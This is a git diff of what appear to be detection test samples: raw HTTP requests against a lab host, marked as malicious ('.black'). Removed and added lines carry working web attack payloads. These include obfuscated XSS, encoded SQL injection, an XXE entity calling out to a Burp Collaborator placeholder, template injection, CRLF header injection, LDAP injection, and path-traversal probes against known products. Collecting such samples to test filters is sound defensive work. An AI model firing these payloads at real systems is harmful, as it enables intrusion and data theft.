diff --git a/testcases/0b/ce/25d5adbf0c39bf88f812f098977e.black b/testcases/0b/ce/25d5adbf0c39bf88f812f098977e.black deleted file mode 100644 index 50bb25a43..000000000 --- a/testcases/0b/ce/25d5adbf0c39bf88f812f098977e.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/0c/47/fde93b5ba630b5110a38819b61f6.black b/testcases/0c/47/fde93b5ba630b5110a38819b61f6.black deleted file mode 100644 index ef38ab421..000000000 --- a/testcases/0c/47/fde93b5ba630b5110a38819b61f6.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27self%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28self%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/0c/4e/f7020e286f9fac38d53f41a0fc46.black b/testcases/0c/4e/f7020e286f9fac38d53f41a0fc46.black deleted file mode 100644 index 1d8928aac..000000000 --- a/testcases/0c/4e/f7020e286f9fac38d53f41a0fc46.black +++ /dev/null @@ -1,15 +0,0 @@ -POST /vulnerabilities/exec/ HTTP/1.1 -Host: 10.10.3.128:2280 -Content-Length: 19 -Cache-Control: max-age=0 -Upgrade-Insecure-Requests: 1 -Origin: http://10.10.3.128:2280 -Content-Type: application/x-www-form-urlencoded -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/exec/ -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - -ip=11&Submit=Submit \ No newline at end of file diff --git a/testcases/0d/8e/88e8eeb6a289d5704818622a124a.black b/testcases/0d/8e/88e8eeb6a289d5704818622a124a.black deleted file mode 100644 index c23986452..000000000 --- a/testcases/0d/8e/88e8eeb6a289d5704818622a124a.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=top%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/10/d2/f38cdacc52aeed18e69cf93bf207.black b/testcases/10/d2/f38cdacc52aeed18e69cf93bf207.black deleted file mode 100644 index 05e0f2d84..000000000 --- a/testcases/10/d2/f38cdacc52aeed18e69cf93bf207.black +++ /dev/null @@ -1,12 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Pragma: no-cache -Cache-Control: no-cache -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cobject+width%3D500+height%3D500+type%3Dtext%2Fhtml%3E%3Cparam+name%3Durl+value%3Dhttps%3A%2F%2Fportswigger-labs.net%3E -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/17/86/aa1a2f33f0c343e2d7b051093456.black b/testcases/17/86/aa1a2f33f0c343e2d7b051093456.black deleted file mode 100644 index b6adf151d..000000000 --- a/testcases/17/86/aa1a2f33f0c343e2d7b051093456.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=%7B%22id%22%3A%22MSBhbmQgMT0yIHNlbGVjdCB2ZXJzaW9uKCkgLS0%3D%22%7D&Submit=Submit -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/20/a7/74d2c5ff9626c6a6f0bfc996dcfb.black b/testcases/20/a7/74d2c5ff9626c6a6f0bfc996dcfb.black deleted file mode 100644 index 74b909f0a..000000000 --- a/testcases/20/a7/74d2c5ff9626c6a6f0bfc996dcfb.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/27/de/481d8a020392df69acdb7d2ced20.black b/testcases/27/de/481d8a020392df69acdb7d2ced20.black deleted file mode 100644 index 904ff5d8e..000000000 --- a/testcases/27/de/481d8a020392df69acdb7d2ced20.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%C0%BCscript%3Ealert(1)%3C/script%3E%E0%80%BCscript%3Ealert(1)%3C/script%3E%F0%80%80%BCscript%3Ealert(1)%3C/script%3E%F8%80%80%80%BCscript%3Ealert(1)%3C/script%3E%FC%80%80%80%80%BCscript%3Ealert(1)%3C/script%3E -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/2a/11/7acb7e70015cb0c6f554d8b5dc2b.black b/testcases/2a/11/7acb7e70015cb0c6f554d8b5dc2b.black deleted file mode 100644 index eedd7956f..000000000 --- a/testcases/2a/11/7acb7e70015cb0c6f554d8b5dc2b.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=%3CstoreId%3E%26%2349%3B%26%2332%3B%26%2385%3B%26%2378%3B%26%2373%3B%26%2379%3B%26%2378%3B%26%2332%3B%26%2383%3B%26%2369%3B%26%2376%3B%26%2369%3B%26%2367%3B%26%2384%3B%26%2332%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23110%3B%26%2397%3B%26%23109%3B%26%23101%3B%26%2332%3B%26%23124%3B%26%23124%3B%26%2332%3B%26%2339%3B%26%23126%3B%26%2339%3B%26%2332%3B%26%23124%3B%26%23124%3B%26%2332%3B%26%23112%3B%26%2397%3B%26%23115%3B%26%23115%3B%26%23119%3B%26%23111%3B%26%23114%3B%26%23100%3B%26%2332%3B%26%2370%3B%26%2382%3B%26%2379%3B%26%2377%3B%26%2332%3B%26%23117%3B%26%23115%3B%26%23101%3B%26%23114%3B%26%23115%3B%3C%2FstoreId%3E&Submit=Submit -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/2b/4c/fea2215581c39d6f6e2714804bc6.black b/testcases/2b/4c/fea2215581c39d6f6e2714804bc6.black deleted file mode 100644 index 6174c3a91..000000000 --- a/testcases/2b/4c/fea2215581c39d6f6e2714804bc6.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Cache-Control: max-age=0 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/2e/13/319afe1fd18239d70b5efced1cdf.black b/testcases/2e/13/319afe1fd18239d70b5efced1cdf.black deleted file mode 100644 index 24bd21a4e..000000000 --- a/testcases/2e/13/319afe1fd18239d70b5efced1cdf.black +++ /dev/null @@ -1,11 +0,0 @@ -GET /minio/bootstrap/v1/verify HTTP/1.1 -Host: 10.10.3.128:8080 -Pragma: no-cache -Cache-Control: no-cache -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/30/60/992b9332907e7ad36168cee03305.black b/testcases/30/60/992b9332907e7ad36168cee03305.black deleted file mode 100644 index d6b59f3cf..000000000 --- a/testcases/30/60/992b9332907e7ad36168cee03305.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/31/95/bbd21aed9c6d944ba22e623a9a0d.black b/testcases/31/95/bbd21aed9c6d944ba22e623a9a0d.black deleted file mode 100644 index 5fee5889d..000000000 --- a/testcases/31/95/bbd21aed9c6d944ba22e623a9a0d.black +++ /dev/null @@ -1,10 +0,0 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 -Host: 10.10.3.128:2280 -Upgrade-Insecure-Requests: 1 -User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 -Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F -Accept-Encoding: gzip, deflate -Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 -Connection: close - diff --git a/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black b/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black index 40a3fd715..cf140f095 100644 --- a/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black +++ b/testcases/34/b7/572a6ebd86e9664bf33f5aaee155.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /vulnerabilities/xss_r/?name={{43426*%2741827%27}} HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28frames%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black b/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black index 39db62d55..7ff613161 100644 --- a/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black +++ b/testcases/38/a9/2862fec989c7d7b2e61ea58b543b.black @@ -1,4 +1,4 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /vulnerabilities/sqli/%0D%0AX-Pen-Test%3AeKqNz22M6K HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 diff --git a/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black b/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black index 820377157..68a0c0f6b 100644 --- a/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black +++ b/testcases/38/df/260eb82e55c9eea40b5f85eab86d.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /actions/seomatic/meta-container/meta-link-container/?uri={{228*%2798%27}} HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28parent%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/39/c8/02d0e455150d0f08ee46787354ca.black b/testcases/39/c8/02d0e455150d0f08ee46787354ca.black index d3dd11602..b166492bf 100644 --- a/testcases/39/c8/02d0e455150d0f08ee46787354ca.black +++ b/testcases/39/c8/02d0e455150d0f08ee46787354ca.black @@ -1,4 +1,4 @@ -GET /%2e/WEB-INF/web.xml HTTP/1.1 +GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1 Host: 10.10.3.128 Pragma: no-cache Cache-Control: no-cache diff --git a/testcases/3f/aa/9095c933141c59546faccf703b75.black b/testcases/3f/aa/9095c933141c59546faccf703b75.black index 57fcd39a8..ea1058187 100644 --- a/testcases/3f/aa/9095c933141c59546faccf703b75.black +++ b/testcases/3f/aa/9095c933141c59546faccf703b75.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /api/products/123%20and%201=1/reviews?page=2&size=10&sort=time HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=a%3D%27constructor%27%3Bb%3D%7B%7D%3Ba.sub.call.call%28b%5Ba%5D.getOwnPropertyDescriptor%28b%5Ba%5D.getPrototypeOf%28a.sub%29%2Ca%29.value%2C0%2C%27alert%281%29%27%29%28%29 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black b/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black index 766b3e66c..c21d2f597 100644 --- a/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black +++ b/testcases/40/9f/a3f8b55ef516ace9ce5b6bd92bb2.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/test HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27ale%27%2B%27rt%27%5D%28globalThis%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/45/c7/2b314c34e964921340f35ddb048d.black b/testcases/45/c7/2b314c34e964921340f35ddb048d.black index 31f97492d..78bbb5c01 100644 --- a/testcases/45/c7/2b314c34e964921340f35ddb048d.black +++ b/testcases/45/c7/2b314c34e964921340f35ddb048d.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /%2bCSCOT%2b/translation-table?default-language&lang=../&textdomain=/%2bCSCOE%2b/portal_inc.lua&type=mst HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3C%21DOCTYPE+stockCheck+%5B%3C%21ENTITY+%25+xxe+SYSTEM+%22http%3A%2F%2FBURP-COLLABORATOR-SUBDOMAIN%22%3E+%25xxe%3B+%5D%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black b/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black index 2670f13a8..2902972ab 100644 --- a/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black +++ b/testcases/46/91/c0fc989e4cf0766cf35af2f22c1a.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?paramd6f70e=admin%2A%29%28%28%7Cuserpassword=%2A%29 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27frames%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28frames%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black b/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black index a9289037c..0a25e8881 100644 --- a/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black +++ b/testcases/47/0b/90f8073eb0c860827befd43c8bd9.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?param25f07d=%2A%29%28uid=%2A%29%29%28%7C%28uid=%2A HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black b/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black index 22f3edabe..ac94790e3 100644 --- a/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black +++ b/testcases/47/e8/60f3f244ef8fb130a8e7fe597184.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /uploadfiles/apache.php.jpeg HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cfoo+xmlns%3Axi%3D%22http%3A%2F%2Fwww.w3.org%2F2001%2FXInclude%22%3E%3Cxi%3Ainclude+parse%3D%22text%22+href%3D%22file%3A%2F%2F%2Fetc%2Fhostname%22%2F%3E%3C%2Ffoo%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/49/e6/139ab3f16b618041e5a61f513c61.black b/testcases/49/e6/139ab3f16b618041e5a61f513c61.black index 401d36e3e..96467d352 100644 --- a/testcases/49/e6/139ab3f16b618041e5a61f513c61.black +++ b/testcases/49/e6/139ab3f16b618041e5a61f513c61.black @@ -1,4 +1,4 @@ -GET /pages/createpage.action?spaceKey=EX&src=quick-create&queryString=%5cu0027%2b%7b233*233%7d%2b%5cu0027 HTTP/1.1 +GET /admin/?a=doSearchParameter&appno=0+union+select+43512*43017,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1 Host: 10.10.3.128 Pragma: no-cache Cache-Control: no-cache diff --git a/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black b/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black index 9de25f768..717c08ee2 100644 --- a/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black +++ b/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black @@ -1,9 +1,8 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+CASE+WHEN+%28YOUR-CONDITION-HERE%29+THEN+1%2F0+ELSE+NULL+END&Submit=Submit 